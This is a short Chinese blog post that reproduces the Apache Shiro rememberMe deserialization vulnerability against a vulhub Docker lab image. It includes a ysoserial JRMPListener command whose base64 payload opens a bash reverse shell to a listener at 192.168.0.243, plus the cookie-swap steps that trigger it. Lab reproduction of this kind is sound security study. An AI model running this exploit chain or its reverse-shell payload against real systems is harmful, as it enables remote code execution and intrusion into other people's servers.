shiro反序列化漏洞复现
发布时间:2022-03-24 13:55:07 535
相关标签: # 漏洞
一、搭建环境
直接重vulhub上拉取环境
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1
二、漏洞复现
方法一、直接工具复现
方法二、手工复现
使用burp抓取数据包
在cookies参数添加;rememberMe=1
查看返回包
如果存在remberMe=deleteMe则说明使用了shoir
使用http://www.jackson-t.ca/runtime-exec-payloads.html 红队反弹shell脚本进行编码
使用ysoserial中的jrmp监听模块
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMjQzLzk4NzYgMD4mMQ==}|{base64,-d}|{bash,-i}"
使用payload生成马
监听端口
将cookies 改为生成的rememberMe
发送,监听成功
特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报